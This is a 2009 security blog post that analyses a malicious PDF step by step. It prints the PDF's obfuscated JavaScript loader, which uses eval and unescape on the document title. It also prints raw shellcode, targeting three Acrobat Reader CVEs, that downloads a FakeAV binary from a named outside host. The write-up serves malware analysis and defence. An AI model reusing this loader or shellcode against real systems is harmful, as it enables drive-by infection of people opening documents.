Jaime Blasco Blog


Exploits: Analyzing a malicious PDF Document
Mon, 21 Dec 2009

In this post I will explain a real case example of how to manually analyze a malicious PDF document.
Some days ago I collected a malicious PDF file, usually Wepawet does an excellent job and automatically analyze the malicious file for you.
In this case Wepawet said "No exploits were identified." so probably the malicious PDF file uses some tricks against automatic analysis.

We start collecting some information of the PDF file:

MD5: 67f3da49ac07e6a5b3be1a743c3ea40d

Collect some PDF object information to begin the analysis using Didier Stevens pdfid.py:

mac-jaime:pdf1 jaimeblasco$ python pdfid.py pdf.php 
PDFiD 0.0.9 pdf.php
 PDF Header: %PDF-1.4
 obj                    9
 endobj                 9
 stream                 3
 endstream              3
 xref                   1
 trailer                1
 startxref              1
 /Page                  1
 /Encrypt               0
 /ObjStm                0
 /JS                    1
 /JavaScript            2
 /AA                    0
 /OpenAction            0
 /AcroForm              0
 /JBIG2Decode           0
 /RichMedia             0
 /Colors > 2^24         0

Now we know there is some javascript and filter objects we should analyze, first we search for Filter objects inside the PDF using Didier Stevens pdf-parser.py:

mac-jaime:pdf1 jaimeblasco$ python pdf-parser.py --search Filter pdf.php 
obj 5 0
 Type: 
 Referencing: 
 Contains stream
 [(1, '\n'), (2, '<<'), (1, ' '), (2, '/Length'), (1, ' '), (3, '4852'), (1, ' '), (2, '/Filter'), (1, ' '), (2, '/FlateDecode'), (1, '\n '), (2, '>>'), (1, '\n')]

 <<
   /Length 4852 
   /Filter /FlateDecode
 
 >>

obj 6 0
 Type: 
 Referencing: 
 Contains stream
 [(1, '\n'), (2, '<<'), (1, ' '), (2, '/Length'), (1, ' '), (3, '299'), (1, ' '), (2, '/Filter'), (1, ' '), (2, '/FlateDecode'), (1, '\n '), (2, '>>'), (1, '\n')]

 <<
   /Length 299 
   /Filter /FlateDecode
 
 >>

We have two streams that should be carefully analyzed, let's see the raw data of obj 5 0:

mac-jaime:pdf1 jaimeblasco$ python pdf-parser.py --object 5 --raw --filter pdf.php | more
obj 5 0
 Type: 
 Referencing: 
 Contains stream
 
<< /Length 4852 /Filter /FlateDecode
 >>


 <<
   /Length 4852 
   /Filter /FlateDecode
 
 >>

 colkokasd assa 443562df sdfs23234266colkokasd assa 443562df sdfs23234275colkokasd assa 
443562df sdfs2323426ecolkokasd assa 443562df sdfs23234263colkokasd assa 443562df sdfs23234274colkokasd 
assa 443562df sdfs
23234269colkokasd assa 443562df sdfs2323426fcolkokasd assa 443562df.........
...........
...........
...........

We have 172K of stream data, we save it for later analyze. Now dump the obj 6 raw data:

mac-jaime:pdf1 jaimeblasco$ python pdf-parser.py --object 6 --raw --filter pdf.php | more
obj 6 0
 Type: 
 Referencing: 
 Contains stream
 
<< /Length 299 /Filter /FlateDecode
 >>


 <<
   /Length 299 
   /Filter /FlateDecode
 
 >>

 
var jxtDqSSfQPmE1 = "";

function cCrqddqiDoTmt(GEoyx8oatAOWi,g7UwbOwqmi0NT,g7UwbOwqmi0NTasd,g7UwbOwqmi0NTbbb)
{
var kokk = eval;
kokk(GEoyx8oatAOWi);
}

function WGBsiR5aIiD9Q(g7UwbOwqmi0NT,g7UwbOwqmi0NTka,g7UwbOwqmi0NTllol,g7UwbOwqmi0NTbban,g7UwbOwqmi0NTkkkl)
{
var uWReX84wKBTnU = "%";
VDzBdR9Xfzz8e = this.info.title;
jxtDqSSfQPmE1 = VDzBdR9Xfzz8e.replace(/colkokasd assa 443562df sdfs232342/g,uWReX84wKBTnU);
eval("var COPC8XTJPCkUm = u"+"nes"+"cape(jxtDqSSfQPmE1);");
cCrqddqiDoTmt(COPC8XTJPCkUm);
}

WGBsiR5aIiD9Q();

This is much better, we have some javascript eval, unescape functions and a reference to this.info.title.
If we inspect the info.title we realize it's linked with the obj 5 0 data with extracted.

As we can see, the javascript code replace "colkokasd assa 443562df sdfs232342" from the obj 5 stream with the var uWReX84wKBTnU ("%")

To emulate the javascript code, first we dump the obj5 data and then use sed to replace data:

python pdf-parser.py --object 5 --raw --filter pdf.php > obj5
sed -i "s/colkokasd assa 443562df sdfs232342/%/g" obj5

We create a js file with the data replace inside var JmfNzd7NdGNhf = "%66%75%6e%63%74%69%6f%6.......... " and then call print(unescape(JmfNzd7NdGNhf));.

If we execute the file with SpiderMonkey:

mac-jaime:pdf1 jaimeblasco$ js obj_5.js

Download the unobfuscated data from here

Now we have the unobfuscated javascript code. The PPPDDDFF() version check for the Acrobat Reader version using the app.viewerVersion Adobe Javascript function and exploits a different vulnerability on each of the identified versions:

  • CVE-2007-5659: Exploiting Collab.collectEmailInfo()
  • CVE-2008-2992: Exploiting util.printf()
  • CVE-2009-0927: Exploiting Collab.getIcon()
  • We also found a shellcode, here is the raw data extracted using SpiderMonkey:

    shellcode = "\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x33\xc0\x64\x8b\x40\x30\x78\x0c\x8b\x40\x0c" \
                            "\x8b\x70\x1c\xad\x8b\x58\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b\x58\x3c\x6a" \
                            "\x44\x5a\xd1\xe2\x2b\xe2\x8b\xec\xeb\x4f\x5a\x52\x83\xea\x56\x89\x55\x04\x56" \
                            "\x57\x8b\x73\x3c\x8b\x74\x33\x78\x03\xf3\x56\x8b\x76\x20\x03\xf3\x33\xc9\x49" \
                            "\x50\x41\xad\x33\xff\x36\x0f\xbe\x14\x03\x38\xf2\x74\x08\xc1\xcf\x0d\x03\xfa" \
                            "\x40\xeb\xef\x58\x3b\xf8\x75\xe5\x5e\x8b\x46\x24\x03\xc3\x66\x8b\x0c\x48\x8b" \
                            "\x56\x1c\x03\xd3\x8b\x04\x8a\x03\xc3\x5f\x5e\x50\xc3\x8d\x7d\x08\x57\x52\xb8" \
                            "\x33\xca\x8a\x5b\xe8\xa2\xff\xff\xff\x32\xc0\x8b\xf7\xf2\xae\x4f\xb8\x65\x2e" \
                            "\x65\x78\xab\x66\x98\x66\xab\xb0\x6c\x8a\xe0\x98\x50\x68\x6f\x6e\x2e\x64\x68" \
                            "\x75\x72\x6c\x6d\x54\xb8\x8e\x4e\x0e\xec\xff\x55\x04\x93\x50\x33\xc0\x50\x50" \
                            "\x56\x8b\x55\x04\x83\xc2\x7f\x83\xc2\x31\x52\x50\xb8\x36\x1a\x2f\x70\xff\x55" \
                            "\x04\x5b\x33\xff\x57\x56\xb8\x98\xfe\x8a\x0e\xff\x55\x04\x57\xb8\xef\xce\xe0" \
                            "\x60\xff\x55\x04\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\x70\x75" \
                            "\x74\x74\x61\x69\x6d\x65\x6e\x74\x2e\x63\x6f\x6d\x2f\x6c\x6f\x61\x64\x2e\x70" \
                            "\x68\x70\x3f\x73\x70\x6c\x3d\x70\x64\x66\x5f\x65\x78\x70"
    

    The shellcode downloads a binary file from hxxp://www.inputtaiment.com/load.php?spl=pdf_exp (Mal/FakeAV-BX), here is the analysis data:

  • VirusTotal
  • ThreatExpert
  • posted at: 14:01 | path: /Exploits | permanent link to this entry | 2 comments |



    * Posted by arebc at Tue Dec 29 21:18:59 2009
    A argument  I find useful is "-f javascript". This of course just searches for javascript.

    Nice job on the write up  :)
    * Posted by arebc at Wed Dec 30 01:47:47 2009
    A argument  I find useful is "-f javascript". This of course just searches for javascript.

    Nice job on the write up  :)

    Name:


    E-mail:


    URL:


    Comment:


    Categories

    / (34)
        Attacks/ (2)
        Exploits/ (1)
        General/ (3)
        Lua/ (1)
        Malware/ (3)
        Nessus/ (6)
            cisco/ (1)
            plugins/ (3)
        Ossim/ (9)
        Scada Security/ (2)
        Security Visualization/ (6)
            Malware/ (2)
        Vulnerability Management/ (1)



    Jaime Blasco
    (feel free to get in touch)
    • Mail
    • Linkedin
    • Twitter
    • Linkedin
    • Forums

    Friend's blogs:
    • /blog/dk
    • /blog/juanma
    • /blog/santiago
    • /blog/pablo/




    RSS




    Lecture...





    < December 2009 >
    MoTuWeThFrSaSu
      1 2 3 4 5 6
    7 8 910111213
    14151617181920
    21222324252627
    28293031   




    Archives

    2010-Aug
    2010-Jul
    2010-Mar
    2010-Jan
    2009-Dec
    2009-Oct
    2009-Sep
    2009-Jul
    2009-Jun
    2009-Apr
    2009-Mar
    2009-Feb
    2009-Jan
    2008-Oct
    2008-Aug




    Tags




    Made with PyBlosxom